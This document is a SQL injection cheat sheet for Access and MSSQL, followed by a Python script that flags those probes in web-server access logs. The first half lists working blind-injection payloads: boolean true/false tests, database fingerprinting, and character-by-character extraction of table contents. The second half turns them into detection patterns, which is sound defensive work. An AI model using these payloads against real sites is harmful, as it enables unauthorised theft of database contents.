Detecting the injection type:
1. Numeric type
and 1=1 //returns the normal page
and 1=2 //returns an error page, or a page different from the one returned for 1=1
2. String type
' and 1=1 and ''=' //returns the normal page
' and 1=2 and ''=' //returns an error page, or a page different from the one returned for 1=1
3. Search (LIKE) type
%' and 1=1 and '%'='% //returns the normal page
%' and 1=2 and '%'='% //returns an error page, or a page different from the one returned for 1=1
Detecting the database type:
and exists (select * from sysobjects) //database check: an error means Access, a normal page means MSSQL
and exists (select * from msysobjects) //confirm using the IIS error message
Access database injection:
1. Guessing table names
and exists (select * from [table_name])
2. Guessing column names
and exists (select [column_name] from [table_name])
3. Guessing the number of records in the table
and (select Count(1) from [table_name] where 1=1) between num1 and num2
4. Guessing the length of a column value
and (select top 1 len([column1]) from (Select Top 1 [column1],[column2],...,[columnN] from [table_name] where 1=1 order by [column1],[column2],...,[columnN]) T Order by [column1] desc,[column2] desc,...,[columnN] desc ) between num1 and num2
5. Guessing the column contents (one character at a time)
and (select top 1 asc(mid(cstr(column1),1,1)) from (Select Top 1 [column1],[column2],...,[columnN] from [table_name] where 1=1 order by [column1],[column2],...,[columnN]) T Order by [column1] desc,[column2] desc,...,[columnN] desc ) between num1 and num2
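Added example (not part of the original cheat sheet): the probes above leave a recognisable trail in web-server access logs, because the technique depends on sending a true condition (1=1) and a false condition (1=2) to the same page and comparing the responses. The Python below parses Combined Log Format lines, URL-decodes the query string, tags requests that match the numeric, string, search and sysobjects/msysobjects probe families listed above, and then pairs a client's 1=1 and 1=2 requests on the same path to report whether the server answered differently (the signal the attacker is looking for, and the one a defender can alert on). The log lines are constructed for this example; the regexes, tag names and function names are this example's own assumptions, not any tool's API.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access log (Combined Log Format, size column last). Not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.asp?id=12%20and%201%3D1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news.asp?id=12%20and%201%3D2 HTTP/1.1" 200 1874
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /news.asp?id=12%20and%20exists%20(select%20*%20from%20sysobjects) HTTP/1.1" 500 912
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search.asp?q=laptop HTTP/1.1" 200 3301
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /search.asp?q=laptop%25%27%20and%201%3D1%20and%20%27%25%27%3D%27%25 HTTP/1.1" 200 3301
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Probe families from the cheat sheet. Applied to the decoded, lower-cased,
# whitespace-collapsed query string. Tag names are this example's own.
PROBE_PATTERNS = [
    ("bool_true", re.compile(r"\band 1=1\b")),                      # and 1=1
    ("bool_false", re.compile(r"\band 1=2\b")),                     # and 1=2
    ("string_close", re.compile(r"'\s*and .*\band ''='")),          # ' and ... and ''='
    ("search_close", re.compile(r"%'\s*and .*'%'='%")),             # %' and ... and '%'='%
    ("mssql_fingerprint", re.compile(r"exists ?\( ?select \* from sysobjects")),
    ("access_fingerprint", re.compile(r"exists ?\( ?select \* from msysobjects")),
    ("access_enum", re.compile(r"exists ?\( ?select .* from \[")),  # exists (select ... from [t])
]


def normalize_query(target: str) -> str:
    """URL-decode the query part of a request target, lower-case it, collapse whitespace."""
    query = urlsplit(target).query
    return re.sub(r"\s+", " ", unquote_plus(query)).strip().lower()


def classify(query: str) -> List[str]:
    """Return every probe family tag whose pattern matches the normalized query."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(query)]


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line into a dict with path, normalized query, tags and size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["path"] = urlsplit(ev["target"]).path
    ev["query"] = normalize_query(ev["target"])
    ev["tags"] = classify(ev["query"])
    ev["size"] = 0 if ev["size"] == "-" else int(ev["size"])
    return ev


def analyze(log_text: str) -> Dict[str, List[dict]]:
    """Group tagged (suspicious) requests by client IP; clients with no hits are omitted."""
    hits: Dict[str, List[dict]] = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["tags"]:
            hits[ev["ip"]].append(ev)
    return dict(hits)


def boolean_pairs(hits: Dict[str, List[dict]]) -> List[dict]:
    """Pair a client's 1=1 and 1=2 requests on the same path.

    A differing status or body size between the two is exactly the "page differs"
    signal the cheat sheet relies on, so it is the highest-confidence alert here.
    """
    pairs = []
    for ip, events in hits.items():
        by_path: Dict[str, Dict[str, dict]] = defaultdict(dict)
        for ev in events:
            for tag in ev["tags"]:
                if tag in ("bool_true", "bool_false"):
                    by_path[ev["path"]][tag] = ev
        for path, pair in by_path.items():
            if "bool_true" in pair and "bool_false" in pair:
                t, f = pair["bool_true"], pair["bool_false"]
                differs = t["size"] != f["size"] or t["status"] != f["status"]
                pairs.append({"ip": ip, "path": path, "response_differs": differs})
    return pairs


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for ip, events in found.items():
        for ev in events:
            print(f"{ip} {ev['path']} {ev['tags']} status={ev['status']} size={ev['size']}")
    for p in boolean_pairs(found):
        print("boolean probe pair:", p)
```

On the sample log the first client is reported for a 1=1/1=2 pair on /news.asp whose responses differ in size, plus an MSSQL fingerprint probe, and the second client for a search-type probe; a pair whose responses do not differ is still worth logging, since it shows the probe was attempted even if the page was not injectable.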